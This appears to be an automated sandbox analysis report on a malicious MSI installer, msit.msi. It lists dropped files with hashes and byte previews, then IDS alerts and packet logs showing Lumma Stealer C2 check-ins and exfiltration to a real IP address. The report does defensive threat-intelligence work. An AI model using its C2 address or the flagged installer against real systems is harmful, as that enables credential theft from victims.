Preview:	...@IXOS.@.....@..-Z.@.....@.....@.....@.....@.....@......&.{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}..msit..msit.msi.@.....@.....@.....@........&.{BA748999-88DC-472F-9632-A6EFC559C1F2}.....@.....@.....@.....@.......@.....@.....@.......@......msit......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{86FA086C-1DD0-4082-AC92-FB7682CD7E34}!.C:\Program Files (x86)\msit\msit\.@.......@.....@.....@......&.{78C5261A-F04A-4AA9-A391-7F6716DBC52E}..02:\Software\msit\msit\Version.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".!.C:\Program Files (x86)\msit\msit\.@........WriteRegistryValues..Writing system registry values..Key: [1], Name: [2], Value: [3]...@.....@.....@.3..$..@......Software\msit\msit...@....%...Version..1.0.0%...Path!.C:\Program Files (x86)\msit\msit\...@.....@.....@."..

C:\Windows\Installer\MSIAEB.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13084160
Entropy (8bit):	7.767097954057833
Encrypted:	false
SSDEEP:	196608:hL1kxR9F9KENR9N4bQOZNxVs0eb+CwRVu4fpbr7vOSPFjytXwt4TPnqunXcHF91v:uF3zv8Zrqb+CUuubX26jytnTPjnXcBv
MD5:	4D82074854750FDBA89D76624CC1E6F6
SHA1:	1CAB8150956317418F64E67692072CAC8472B75B
SHA-256:	019CF1AAD1F8D4F1B5DAE3AA609B2B53CFFC3C7894B58B9F0B225868AED7342D
SHA-512:	068BD8C1DB17C4DEF612618D463239F002E8F4712691A8FC9163215BDAA7BC5306AA861C396438C647E7B839C2C67C5709B25E0695E1BAA668AA100310255F9D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....[g.........."................X].........@.............................0......g.....`..................................................n..(................2.......................................... e..(......@............q...............................text............................... ..`.rdata............................@..@.data....I....... ..................@....pdata...2.......4..................@..@.fptable.....P......................@....tls.........`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

C:\Windows\Installer\SourceHash{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.16232893070391
Encrypted:	false
SSDEEP:	12:JSbX72FjNAGiLIlHVRpzh/7777777777777777777777777vDHF/Y856bQp01l0G:J7QI538j8F
MD5:	A037DDE7434A714359AC91D9BCBB73B5
SHA1:	E6E54D34CFFD15F2DFC25F6591BC72815C881CFF
SHA-256:	D849B3C722764CD734D828C79C7E5DD345ACF93C1F2E5CBB1BF66B544AD252A4
SHA-512:	D19AA5CF4994574303D847293D150A79579708B4821EC255B3A75B9D3D35E5225AD202680FD4D24644C23A0CD9806EBBDC79F41ACED29064DCDA61FA27B1FB8B
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5716020855141486
Encrypted:	false
SSDEEP:	48:i8PhUuRc06WXJeFT5dAdpSkdHAEkrCynGrVM+dpSkdTTd:NhU11FTDyGRCoGv/
MD5:	B8FA65AFB5DDD7B61D99D622083560F6
SHA1:	C0186F4D5593EA35936EA89F02E0F6C5D029065D
SHA-256:	E1AF8E80FC2E2204C1C65B928357147E99D7D1B9E9E14892D9A656B035CDE3B9
SHA-512:	1A55EFDE09A5282D2C48D8B17C58BB88334C6104650C78518275142C1E1E7AB524B15A11AD2E1B20B12CE484C18030F8E7458CE1E05D61E13F791DC56E50C0D1
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	360000
Entropy (8bit):	5.362985130311034
Encrypted:	false
SSDEEP:	1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauR:zTtbmkExhMJCIpEG
MD5:	169A7E5B5C366E7E7CAEA92D4FAD1BEB
SHA1:	DB7730B83851555D0B4C4789C1CFBF2619E53D78
SHA-256:	43C02F9F7378BD3DCBF78D805A1B4ECC347BEAA38A1F20917E09AA4C325611A1
SHA-512:	A1B3D565430CB20B6B81A76B84F8876FF2F795726C31080CA13E2854CD255D1A64F147DFE5EC1C7F80D2C69DD3CE1C9B12EF023093E9A5A5698ED7E6F818BE5F
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

C:\Windows\Temp\~DF0FD1CA284D6BB733.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.06852653289585642
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKOIs8tkGMdUrMtIWstoVky6l0t/:2F0i8n0itFzDHF/Y856Dx01
MD5:	AD44AE53DB82B181D75735395EB7675B
SHA1:	982AC3B94AC655DA23D5CE07F497E07811DA3573
SHA-256:	E06F8146FBA0D47EF7DFDAFB25581B7EF264ABC21877F6502AEBC9826FD88FB2
SHA-512:	A8041CEDF88B53BF2436244A7C6B7F4E65361FF2418302E2C4B26E5E139FEECA6A3CEFF6B29F4F068A766AD269F0F1471F3EEFED9754939A5F9C9C9080B693C7
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF3EE20A31BB6F5DAE.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5716020855141486
Encrypted:	false
SSDEEP:	48:i8PhUuRc06WXJeFT5dAdpSkdHAEkrCynGrVM+dpSkdTTd:NhU11FTDyGRCoGv/
MD5:	B8FA65AFB5DDD7B61D99D622083560F6
SHA1:	C0186F4D5593EA35936EA89F02E0F6C5D029065D
SHA-256:	E1AF8E80FC2E2204C1C65B928357147E99D7D1B9E9E14892D9A656B035CDE3B9
SHA-512:	1A55EFDE09A5282D2C48D8B17C58BB88334C6104650C78518275142C1E1E7AB524B15A11AD2E1B20B12CE484C18030F8E7458CE1E05D61E13F791DC56E50C0D1
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF61D7917677B59F83.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF671F4BF1D548D7B1.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF76783C6014623E29.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.1389890362895574
Encrypted:	false
SSDEEP:	24:PacTx+dpipV+dH+dpipV+dHAEV+/jCynG+leVgwGgItQH5MF+Q7:ScT4dpSkdedpSkdHAEkrCynGrVMF
MD5:	D874BAB7E21F879CBD088F9E81750CB9
SHA1:	50678FCA5BDA644ECD1674F13F847265A686A6CA
SHA-256:	91C2EFBDC9EEE6E892923C310F317E1A80EC006676E35E703AF7737F3840A122
SHA-512:	465B4DB51938E650A02DEF14CA8B6D7B917A24EA30131554A206C647D59B336D52947651EA37B4B832C1D41CAB93A50C9F0705D227A26A73E356FDF1CB450739
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF8C9C00BCF6ADB6AE.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.258678752436576
Encrypted:	false
SSDEEP:	48:w9cuCDBO+CFXJfT5jAdpSkdHAEkrCynGrVM+dpSkdTTd:kchO3T9yGRCoGv/
MD5:	A9F28E83F5185D85C77B8B3289E4B618
SHA1:	8BB37DFA46D7A34AFE105445EFE799A775B7472B
SHA-256:	59BFC10F2F62CE56962116F84BA96AF775C95F8C1ED08D08DD8AD64DB996A92F
SHA-512:	ABD63B1F34977EBE0715ABD3B19424909D2950B2675B53907C374DE346FF530A4C8AFFA7C8AD2EB70B50C4C581AB02F8B2B52EE1222D7EB4EA6C7CA284FC4EC3
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFB68E2628B551697D.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.258678752436576
Encrypted:	false
SSDEEP:	48:w9cuCDBO+CFXJfT5jAdpSkdHAEkrCynGrVM+dpSkdTTd:kchO3T9yGRCoGv/
MD5:	A9F28E83F5185D85C77B8B3289E4B618
SHA1:	8BB37DFA46D7A34AFE105445EFE799A775B7472B
SHA-256:	59BFC10F2F62CE56962116F84BA96AF775C95F8C1ED08D08DD8AD64DB996A92F
SHA-512:	ABD63B1F34977EBE0715ABD3B19424909D2950B2675B53907C374DE346FF530A4C8AFFA7C8AD2EB70B50C4C581AB02F8B2B52EE1222D7EB4EA6C7CA284FC4EC3
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFBD543AED5623E64A.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFD37AC80A86772D19.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5716020855141486
Encrypted:	false
SSDEEP:	48:i8PhUuRc06WXJeFT5dAdpSkdHAEkrCynGrVM+dpSkdTTd:NhU11FTDyGRCoGv/
MD5:	B8FA65AFB5DDD7B61D99D622083560F6
SHA1:	C0186F4D5593EA35936EA89F02E0F6C5D029065D
SHA-256:	E1AF8E80FC2E2204C1C65B928357147E99D7D1B9E9E14892D9A656B035CDE3B9
SHA-512:	1A55EFDE09A5282D2C48D8B17C58BB88334C6104650C78518275142C1E1E7AB524B15A11AD2E1B20B12CE484C18030F8E7458CE1E05D61E13F791DC56E50C0D1
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFD6E1C25EA65699F9.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFE62DA44517EEF39A.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFF60C4AF58FA618CC.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.258678752436576
Encrypted:	false
SSDEEP:	48:w9cuCDBO+CFXJfT5jAdpSkdHAEkrCynGrVM+dpSkdTTd:kchO3T9yGRCoGv/
MD5:	A9F28E83F5185D85C77B8B3289E4B618
SHA1:	8BB37DFA46D7A34AFE105445EFE799A775B7472B
SHA-256:	59BFC10F2F62CE56962116F84BA96AF775C95F8C1ED08D08DD8AD64DB996A92F
SHA-512:	ABD63B1F34977EBE0715ABD3B19424909D2950B2675B53907C374DE346FF530A4C8AFFA7C8AD2EB70B50C4C581AB02F8B2B52EE1222D7EB4EA6C7CA284FC4EC3
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {BA748999-88DC-472F-9632-A6EFC559C1F2}, Number of Words: 2, Subject: msit, Author: msit, Name of Creating Application: msit, Template: ;1033, Comments: This installer database contains the logic and data required to install msit., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Fri Dec 13 03:26:19 2024, Last Saved Time/Date: Fri Dec 13 03:26:19 2024, Last Printed: Fri Dec 13 03:26:19 2024, Number of Pages: 450
Entropy (8bit):	7.611938145565435
TrID:	Windows SDK Setup Transform Script (63028/2) 47.91% Microsoft Windows Installer (60509/1) 46.00% Generic OLE2 / Multistream Compound File (8008/1) 6.09%
File name:	msit.msi
File size:	16'847'872 bytes
MD5:	18577f68754f3e2703cdca2df9ba65ff
SHA1:	8d8846470510b1b6f81c0725975c7c3589568bb3
SHA256:	413c17f73a0831d6ae209e491856a66e07e8c0af70e7e06f68a7b7570ccb3a95
SHA512:	eb238a258b0dfe40716c2a8bc847951abbac4e7224ecefcb13be559a63cc39e6645e406764991cb60b87aa082196b890ff78c3c25c659b851eb02c4064e8eaec
SSDEEP:	393216:LPF3zv8Zrqb+CUuubX26jytnTPjnXcBv9k2VvOTp:JzwqNUHytvnMd9Z
TLSH:	5907E1157EBFE5EDF17E0035861616338A3B6D990B3251FB72E266409E360D21FF2622
File Content Preview:	........................>...........................................1...........H.......p.......i..............................................................................................................................................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-13T08:29:11.533777+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49711	172.67.134.197	443	TCP
2025-01-13T08:29:12.199354+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49711	172.67.134.197	443	TCP
2025-01-13T08:29:12.199354+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49711	172.67.134.197	443	TCP
2025-01-13T08:29:12.760819+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49717	172.67.134.197	443	TCP
2025-01-13T08:29:13.263540+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	49717	172.67.134.197	443	TCP
2025-01-13T08:29:13.263540+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49717	172.67.134.197	443	TCP
2025-01-13T08:29:13.982385+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49728	172.67.134.197	443	TCP
2025-01-13T08:29:15.144517+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49734	172.67.134.197	443	TCP
2025-01-13T08:29:16.338516+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49741	172.67.134.197	443	TCP
2025-01-13T08:29:16.950627+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	49741	172.67.134.197	443	TCP
2025-01-13T08:29:18.004044+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49753	172.67.134.197	443	TCP
2025-01-13T08:29:19.579194+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49765	172.67.134.197	443	TCP
2025-01-13T08:29:21.624274+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49781	172.67.134.197	443	TCP
2025-01-13T08:29:21.949582+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49781	172.67.134.197	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 08:29:11.041421890 CET	49711	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:11.041460991 CET	443	49711	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:11.041531086 CET	49711	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:11.046165943 CET	49711	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:11.046181917 CET	443	49711	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:11.533688068 CET	443	49711	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:11.533776999 CET	49711	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:11.735208035 CET	49711	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:11.735235929 CET	443	49711	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:11.736233950 CET	443	49711	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:11.784421921 CET	49711	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:11.796814919 CET	49711	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:11.796838045 CET	49711	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:11.796921015 CET	443	49711	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:12.199331045 CET	443	49711	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:12.199440002 CET	443	49711	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:12.199493885 CET	49711	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:12.201241016 CET	49711	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:12.201252937 CET	443	49711	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:12.201292992 CET	49711	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:12.201297998 CET	443	49711	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:12.267920971 CET	49717	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:12.268013000 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:12.268105030 CET	49717	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:12.268419981 CET	49717	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:12.268450975 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:12.760734081 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:12.760818958 CET	49717	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:12.762113094 CET	49717	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:12.762126923 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:12.762916088 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:12.764091015 CET	49717	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:12.764108896 CET	49717	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:12.764173985 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.263602018 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.263734102 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.263798952 CET	49717	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:13.263829947 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.263907909 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.263963938 CET	49717	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:13.263972044 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.264054060 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.264136076 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.264175892 CET	49717	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:13.264183044 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.264245987 CET	49717	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:13.264251947 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.264389992 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.264439106 CET	49717	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:13.264445066 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.268271923 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.268349886 CET	49717	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:13.268362045 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.315679073 CET	49717	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:13.355529070 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.355628014 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.355688095 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.355722904 CET	49717	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:13.355750084 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.355792999 CET	49717	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:13.355803967 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.355818033 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.355855942 CET	49717	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:13.356070995 CET	49717	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:13.356086969 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.356101036 CET	49717	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:13.356106997 CET	443	49717	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.496712923 CET	49728	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:13.496752024 CET	443	49728	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.496850967 CET	49728	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:13.497251034 CET	49728	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:13.497263908 CET	443	49728	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.982311010 CET	443	49728	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.982384920 CET	49728	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:13.983823061 CET	49728	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:13.983839989 CET	443	49728	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.984241962 CET	443	49728	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:13.985701084 CET	49728	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:13.985816002 CET	49728	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:13.985845089 CET	443	49728	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:14.533185959 CET	443	49728	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:14.533313036 CET	443	49728	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:14.533361912 CET	49728	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:14.533478022 CET	49728	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:14.533503056 CET	443	49728	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:14.673934937 CET	49734	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:14.673968077 CET	443	49734	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:14.674220085 CET	49734	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:14.674591064 CET	49734	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:14.674603939 CET	443	49734	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:15.144442081 CET	443	49734	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:15.144516945 CET	49734	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:15.145981073 CET	49734	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:15.145989895 CET	443	49734	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:15.146239042 CET	443	49734	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:15.147604942 CET	49734	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:15.147779942 CET	49734	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:15.147814035 CET	443	49734	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:15.147861958 CET	49734	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:15.195328951 CET	443	49734	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:15.663930893 CET	443	49734	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:15.664030075 CET	443	49734	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:15.664097071 CET	49734	443	192.168.2.6	172.67.134.197
